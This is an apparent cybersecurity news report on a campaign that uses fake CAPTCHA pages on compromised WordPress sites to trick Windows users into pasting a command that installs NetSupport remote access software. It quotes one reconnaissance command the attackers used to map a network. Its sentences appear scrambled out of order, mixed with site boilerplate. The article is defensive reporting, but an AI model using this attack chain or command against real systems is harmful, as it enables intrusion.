The Cybereason Global Security Operations Center (GSOC) discovered the campaign in May 2025, revealing how threat actors are weaponizing legitimate remote access tools to gain unauthorized control over victim computers. “This technique is particularly insidious because it exploits user familiarity with CAPTCHA challenges while bypassing browser security controls,” explained security researchers. “The key is recognizing that any instruction requiring users to paste commands into Windows Run dialogs should be treated as highly suspicious,” security researchers emphasized. The attackers use NetSupport’s legitimate remote command prompt feature to execute commands such as “net group /domain ‘Domain Computers'” to map the network infrastructure. “The user themselves perform the final execution step, evading automated detection systems.” Once installed, the NetSupport Client establishes a persistent connection to command-and-control servers located in Moldova. According to threat intelligence data, NetSupport Manager ranked as the seventh most prevalent threat in 2024, with cybercriminals increasingly favoring legitimate tools to blend malicious activities with normal IT operations. Security experts recommend immediate isolation of affected systems, password resets for compromised accounts, and blocking of identified malicious domains and IP addresses. “The attackers are specifically targeting Windows users and have built in mechanisms to avoid detection,” said cybersecurity analysts familiar with the investigation. Believing they’re completing a standard security check, victims unknowingly execute a command that downloads and installs the NetSupport Client software. The attack represents a significant evolution in cybercriminal tactics, combining website compromise with psychological manipulation to bypass modern security defenses. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. The malicious script first identifies the user’s operating system and browser details, then checks if they’ve visited the site before using local storage tracking to minimize exposure. Within hours of a successful compromise, threat actors have been observed conducting reconnaissance activities, including querying Active Directory for domain computers and transferring files to public directories. After the initial infection, victims are presented with a fake CAPTCHA verification page that appears legitimate, complete with modern styling using React frameworks and TailwindCSS. The campaign begins with phishing emails, PDF attachments, or malicious links posted on gaming websites that redirect users to compromised WordPress sites. The fake CAPTCHA then instructs users to press Windows + R and paste the “verification code” into the Run dialog box. Kaaviya is a Security Editor and fellow reporter with Cyber Security News.
This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 08 Jul 2025 11:35:15 +0000